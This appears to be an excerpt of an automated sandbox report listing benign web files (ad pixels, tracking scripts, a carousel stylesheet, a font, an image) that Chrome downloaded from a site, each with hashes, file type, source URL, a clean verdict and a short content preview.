                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C879273F5FC0C11FB2C76E9C075CB4723BD050CBC46B63C5CEDD5CF4B952E29450E4D39364559B8418A0F97F46F5E616FFC9B4FF8397371F29C49EB3E7BC7477
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:.slick-slider{position:relative;display:block;box-sizing:border-box;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-touch-callout:none;-khtml-user-select:none;-ms-touch-action:pan-y;touch-action:pan-y;-webkit-tap-highlight-color:transparent}.slick-list{position:relative;display:block;overflow:hidden;margin:0;padding:0}.slick-list:focus{outline:0}.slick-list.dragging{cursor:pointer;cursor:hand}.slick-slider .slick-list,.slick-slider .slick-track{-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.slick-track{position:relative;top:0;left:0;display:block;margin-left:auto;margin-right:auto}.slick-track:after,.slick-track:before{display:table;content:''}.slick-track:after{clear:both}.slick-loading .slick-track{visibility:hidden}.slick-slide{display:none;float:left;height:100%;min-height:1px}[dir=rtl] .slick-slide{float:right}.slick-sl
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjssiiixF6wlpgjjzbistohbxE5yerVTV11xg5Vh4gBiRUbvDIxcLLfzPnmNQNzVVMP_cancWpBet5Txwk_FHU3hJzWB8VvkHIfcL7E5Xhh5vw0OWJJk0wEiPTBuWaL_rkf7l1z-vbRemS13XOy59niKmeP0iU5fjzELNeg&sai=AMfl-YR1wyDbYhidNEkovlC1aeVZciZl2MsVt7Et8vg-nMEmwwZ5o3IJeIgPKlMp7D30dcSV0a6nuch34sCaFRZRitBWNeY-bqonz5ZhmY2wdHXqjFyB9Sji5ztdYtmK4XJ2hiUJcaQv88BUg2L9MW-nIQ&sig=Cg0ArKJSzFNqdUMmxB1OEAE&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CYYAQ&id=lidartos&mcvt=6122&p=0,0,250,300&tm=6747.5&tu=626&mtos=6122,6122,6122,6122,6122&tos=6122,0,0,0,0&v=20241009&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=22&adk=1080356790&rs=2&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0%3D&vs=4&r=b&co=2482995801&rst=1728897154918&rpt=3415&ec=1&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):343
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.126114190832608
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:qTjxO96Ko6J+RRRF7FYKLIYAB3gbQ5IyG5IFHwFYfJWDq/czid0NVaXz:qTjxPKl+3RFBYKLIYM38Q5RG5IFQqfWo
                                                                                                                                                                                                                                                                                                                                                                          MD5:46561D0DA55B6E4549B48BFEE1D82F23
                                                                                                                                                                                                                                                                                                                                                                          SHA1:279544278D2D63B78F801B146C95117CA236C929
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:70170E469D8D05527ACAB7E3335C6FE91E2966DDBB6E9EA6211260B8F717D120
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A7EC69BBF71466264C6AF1F08771F9F03CCD1EE16E5F6CB57C2D21839E438774B3BE15DBE000D7654BCF99680CE0747DACBAA86EE117A887837308AB514E61AD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn-tc.33across.com/lotame-sync.html
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!doctype html><html><head></head><body>..<script>.(function() {. var o = (window['lotame_sync_16311'] = {});. o.config = {onProfileReady: function(){}};. o.data = {};. o.cmd = [function(){window.lotame_sync_16311.sync();}];.})();.</script>..<script async src="https://tags.crwdcntrl.net/lt/c/16311/sync.min.js"></script>..</body></html>..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], baseline, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):29882
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.818283395365702
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:f0uxM+qrZYmnb7DmWaAI8TatKPy/BNsF+7wTpcGb333333pAP:f0uxM+qrambOfuwp/B2gwTpcGb333330
                                                                                                                                                                                                                                                                                                                                                                          MD5:7F2DF7635CF0C65215F1D7B06121B830
                                                                                                                                                                                                                                                                                                                                                                          SHA1:46C3341E3CF36405A6A1284573D2C1A475791F5C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7C2894035A97E01D6B6BBEA2528887D30E1766E50B0A22CDD10F68131E924CFD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5044359F7975CEDFC8AD503D7A9BCEC7DE5CFA296A955073DFD12EFC0950BC6FD0B668DF2410295F8017F79269130D989198539DBA6411C428209D4443454852
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV2mufCwic-NGC9wpgCnQ_tNbFA-l8rrqbieFyIxc-hwTYbS3a1TQOLU60Y3imqy1yV2Ra0mLvkxr0mtirFQzRdl8HUIFGwZeHbN-1ZYAFW0XPgAB4Joue2DmmjAJHamVEq0bhi80fVeW8ke7prIDNkNsCHk_8H_jfvg2VB1AGMJndzaxuFOSC_HidiCg3/s1600/motor%20insurance%20quote.jpg
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF.....`.`.....xExif..II*...................1.......>...............i.......F.......Google............0220........@...........@..........C....................................................................C.......................................................................@.@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......j...H..k.:..o.j..%..d}.&HfQ.!..W..........o.....;T..C....?.h..K=~sF..W.....fi..f-K..KIYY5m,~[.]..f...k........|...?.[....../.>...9...o.....;_.;}..._Y....#.?.....?..3~....O.Q.....s..B.=?.C...h.....9..-....C...k.ko..}..../..O.........3~..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):563542
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.691696699892101
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:+/BB2agf6gELfQuLfQethykggjunRI2MqlL6ojtm03L1GgX9in9tYCiTKOnTK8L8:pTf1Gqeplru4
                                                                                                                                                                                                                                                                                                                                                                          MD5:CE26171EFF05376A1B746EFBB809F7F6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:888797DD7B55916C92FC1B1F2249F6A8885C67BB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D44882AB82ADEEF2856A0D52FB54BB70E472BE45D50AA3A16B4CB39223391A99
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8B26CA3A80C4326ED86B3A42DC7A2755BC28E641DA116F95FC3BEB6E12428A03D00F6A949422D3B81EB1CA4FE91AD062C33F55B7D437E68BAA0FAF3C5A333ACC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){var e,a,t;null==window.leadflows&&(window.leadflows={});null==(e=window.leadflows).preservedLeadinGlobals&&(e.preservedLeadinGlobals={});null==(a=window.leadflows).preservedOtherGlobals&&(a.preservedOtherGlobals={});t=function(e,a){a[e]=window[e];try{delete window[e];if(window[e])return window[e]=void 0}catch(e){}};window.leadflows.preserveGlobals=function(e,a){var n,i,l,o,s;for(n=0,l=e.length;n<l;n++){s=e[n];t(s,leadflows.preservedLeadinGlobals)}if(a)for(i=0,o=a.length;i<o;i++){s=a[i];t(s,leadflows.preservedOtherGlobals)}}}();leadflows.preserveGlobals(["hns","hns2","jade","I18n","Pikaday","reqwest"],["exports","define"]);window.leadflows=window.leadflows||{};window.leadflows.version="lead-flows-js/static-1.1724/".replace(/\/(static(-\d+\.\d+)?)\//,"-$1");window.MutationObserver=window.MutationObserver||function(e){"use strict";function a(e){this._watched=[];this._listener=e}function t(e){!function t(){var n=e.takeRecords();n.length&&e._listener(n,e);e._timeout=setTimeout(t
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (840), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.758123420792071
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:haoDCfJ2fJf0F5Kpp3iFOy7RBOy1kqLROZeFJF5G:TeORFppIRZlLlFM
                                                                                                                                                                                                                                                                                                                                                                          MD5:62E0E2CEB69B2C70C94030B35692127F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D6C9507D67F5D3D98480342F7B5DF27710BCE378
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:230E9955145710EAAEE1AC721AA1C4607DE2ACCEF0EB61FAE0ECE7FC1684C1A5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F11C8A4D0D271B6C6592820D6AA2727878E67E5C532EA566DD44F5FFEFF7F2804F171412C2CC7B0BA368269C5C3D8B2E0A93E19F30C15C19057BEEEDDB7F7918
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&h=600&twa=1&slotname=3704632056&adk=3031347918&adf=2571581873&pi=t.ma~as.3704632056&w=243&abgtt=3&fwrn=4&fwrnh=100&lmt=1728897154&rafmt=1&armr=4&format=243x600&url=https%3A%2F%2Fald.my.id%2F&fwr=0&rs=1&rh=250&rw=243&rpe=1&resp_fmts=4&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152700&bpp=11&bdt=1788&idt=1670&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&correlator=2303771533125&frm=20&pv=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=1037&ady=6&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CaoeE%7C&abl=CA&pfx=0&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=1915
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CObMi-fDjYkDFajMOwIdUUQLxw"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-2542884292174911\\\",null,null,[[\\\"ID=e15e97283e0b3fb4:T=1728897156:RT=1728897156:S=ALNI_MYRNG1HPVqQsa-4utWAUE8vNrxP-A\\\",1762593156,\\\"/\\\",\\\"ald.my.id\\\",1],[\\\"UID=00000f3de1cd4724:T=1728897156:RT=1728897156:S=ALNI_Mb-8bs9BxH8dyxhyiy5I3-J86_ntw\\\",1762593156,\\\"/\\\",\\\"ald.my.id\\\",2]],[\\\"ID=4298334f4f5b7ee9:T=1728897156:RT=1728897156:S=AA-AfjZaOzpjzbHfJU7qrslv--jQ\\\",1744449156,\\\"/\\\",\\\"ald.my.id\\\"]]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65327)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):70475
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.380996746038723
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:ZKblURHpp4V2JLxcbvM/9mU7C7Az6v0j861:ZmlgJpEvM/9D9z6cI61
                                                                                                                                                                                                                                                                                                                                                                          MD5:48BB5C8A01043ECEAF45E65D5C98950B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4603360883DD66F7254CD5DB17777748226DC657
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:77080938572095BDDC311784E1C284E7CD12268F46946AFF94D04A43A53DFFC9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3A03DD060953E790E8ECB40DBE64F2CE4980DAE93433209C40C56910231663660306FE5FCD3D8D3041CC2BAECACA1E3DB1E5C27C39B1A23381D633CA432992DD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! For license information please see project.js.LICENSE.txt */.!function(){"use strict";var t={}.toString,e=function(e){return t.call(e).slice(8,-1)},r=Array.isArray||function(t){return"Array"==e(t)},n=function(t){return"object"==typeof t?null!==t:"function"==typeof t},i=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t},o=function(t){return Object(i(t))},s=Math.ceil,a=Math.floor,u=function(t){return isNaN(t=+t)?0:(t>0?a:s)(t)},c=Math.min,l=function(t){return t>0?c(u(t),9007199254740991):0},f=function(t,e){if(!n(t))return t;var r,i;if(e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;if("function"==typeof(r=t.valueOf)&&!n(i=r.call(t)))return i;if(!e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;throw TypeError("Can't convert object to primitive value")},d=function(t){try{return!!t()}catch(t){return!0}},h=!d((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})),p="object"==typeof window&&window&&window.Ma
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2200)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):24012
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.499994743081386
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:PD7E758N1SahurmdjZNUxHSB6iQBO4EqNHBcBBN+/bm4QmkVGtZ9uy4YD8Wy/hLx:PDC5I1SavdjZNoyB6iQw4tTEg/bm4Qma
                                                                                                                                                                                                                                                                                                                                                                          MD5:34F47B33B9D06D12ECECD1AD29055BBC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7D07A10318E2A772329F82155F946E72921D81F8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1614281EA3CEB097071B78B590AF2C261515D1454CE40D35D256FC6399A95BA6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6F17D2037FD3C48C36147B30BF3B6237C54C3B0121F3D4DA7ECA8C22E680A089F87070E72DED3B3CD54F2A3AC502B15C76F6E3ECCC62BCE5D3B4D828D2C5ED47
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/pagead/js/r20241009/r20110914/abg_lite_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a){m.setTimeout(()=>{throw a;},0)};var ba,n;a:{for(var ca=["CLOSURE_FLAGS"],p=m,da=0;da<ca.length;da++)if(p=p[ca[da]],p==null){n=null;break a}n=p}var fa=n&&n[610401301];ba=fa!=null?fa:!1;var q;const ha=m.navigator;q=ha?ha.userAgentData||null:null;function ia(a){return ba?q?q.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function t(a){var b;a:{if(b=m.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function u(){return ba?!!q&&q.brands.length>0:!1}function ja(){return u()?ia("Chromium"):(t("Chrome")||t("CriOS"))&&!(u()?0:t("Edge"))||t("Silk")};function ka(a,b){return Array.prototype.indexOf.call(a,b,void 0)};function la(a){la[" "](a);return a}la[" "]=function(){};!t("Android")||ja();ja();t("Safari")&&(ja()||(u()?0:t("Coast"))||(u()?0:t("Opera"))||(u()?0:t("Edge"))||(u()?ia("Microsoft Edge"):t("Edg/"))||u()&&ia("Opera"));let m
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):149
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627174014925919
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YAWVJL23KBQWkDH0dWHRXvjLPpuFBMbJCK7S0VKVMmRT/eHioeRHYn:YAW7Kdb0aXLLsBWCK7vVKHpeHuBY
                                                                                                                                                                                                                                                                                                                                                                          MD5:63E36DDA2E4B9BA50F1F9484A43BAB18
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CA8D876074A70C1A7D719F5174FFDEB76E0F4D4F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:43315982EAA061A69490863B26E47DDB1B6FA27E029915C5292ACD3C9558EE90
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D8F93FA5A6638F439037E6F546B9052C359B1FCCD4A1E0DB7E46E38137BCDE707D60C4537A4D30E8B64715B07B6758A8B6C3396CABB8B1FFB96C30F2EAD56DAF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://settings.luckyorange.com/759fd941
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"error":true,"statusCode":403,"code":"trackingDisabled","message":"Tracking has been disabled for the owner of this site.","site":{"id":"759fd941"}}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2444
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.67310758785311
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Guji4KtlT+YU9MpRa/zcFhxpLKiu/lHpegj5y72a4ukvzLx:vi4KtlTla/szp6yqaIvzLx
                                                                                                                                                                                                                                                                                                                                                                          MD5:4269AD5393B1CA281165D492E342E8EC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:41FE24BEA5FCAE815BD6A9EB804D676F365342A1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:15C7F8D034C3882DE3BCD23681ECECF664BBC31A1FA0BFD012318DE67B656B39
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:38F4DCF388450EA7BE51D7364931C097B34217A0743B37E7C3885FA6702FE1E96B44E3FC1D5692C542C33045AA86FB614FA7AF4A1A225FB9680021036B3B5E51
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pd.sharethis.com/pd/dtscout
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function () {. try {.. // set up our pixel. var fcmp = typeof __cmp == 'function';. var fcmpv2 = typeof __tcfapi == 'function';. var rnd = Math.random();. var img = document.createElement('img');. var exptid = encodeURIComponent('ZHoAA2cM4IQAAAAICdw7Aw==');. var url = window.top.location === window.location ? window.location.toString() : document.referrer;. var img_src = 'https://pd.sharethis.com/pd/dtscout?_t_=px&url=' + encodeURIComponent(url) + '&event_source=dtscout' + '&rnd=' + rnd + '&exptid=' + exptid + '&fcmp=' + fcmp;. img.async = true;.. // set up the aqfer script. var pxscrpt = document.createElement('script');. pxscrpt.id = 'pxscrpt';. pxscrpt.async = true;. var pxscrpt_src = 'https://t.sharethis.com/1/k/t.dhj?cid=c010&cls=C&rnd=' + rnd + '&stid=' + exptid;.. var done = false;. function load() {. img.src = img_src;. document.body.appendChild(img);. pxscrpt.src = pxscrpt_src;. document.body.appendChild(pxs
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjssiiixF6wlpgjjzbistohbxE5yerVTV11xg5Vh4gBiRUbvDIxcLLfzPnmNQNzVVMP_cancWpBet5Txwk_FHU3hJzWB8VvkHIfcL7E5Xhh5vw0OWJJk0wEiPTBuWaL_rkf7l1z-vbRemS13XOy59niKmeP0iU5fjzELNeg&sai=AMfl-YR1wyDbYhidNEkovlC1aeVZciZl2MsVt7Et8vg-nMEmwwZ5o3IJeIgPKlMp7D30dcSV0a6nuch34sCaFRZRitBWNeY-bqonz5ZhmY2wdHXqjFyB9Sji5ztdYtmK4XJ2hiUJcaQv88BUg2L9MW-nIQ&sig=Cg0ArKJSzFNqdUMmxB1OEAE&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CYYAQ&id=lidar2&mcvt=1010&p=0,0,250,300&tm=1635.5&tu=626&mtos=1010,1010,1010,1010,1010&tos=1010,0,0,0,0&v=20241009&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=22&adk=1080356790&rs=2&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0%3D&vs=4&r=v&co=2482995800&rst=1728897154918&rpt=3415&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):15552
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                                                                                                                                                                          MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
